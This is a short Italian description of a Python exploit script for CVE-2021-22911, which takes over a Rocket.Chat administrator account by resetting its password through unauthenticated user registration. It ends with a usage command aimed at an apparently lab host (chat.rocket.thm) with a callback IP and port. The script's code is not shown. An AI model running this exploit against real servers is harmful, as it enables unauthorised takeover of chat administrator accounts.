
Script di exploit Python per CVE-2021-22911 che mira al reset della password amministratore di Rocket.Chat tramite registrazione utente non autenticato. Automatizza lo sfruttamento con target configurabile, nome utente amministratore e IP di callback.
Se hai già registrato un utente, questo reimposta solo la password dell'amministratore, e non entrambe. Ciò rende l'exploit molto più veloce.
python3 exploit.py -u test -a [email protected] -t http://chat.rocket.thm -i 10.10.4.24 -p 80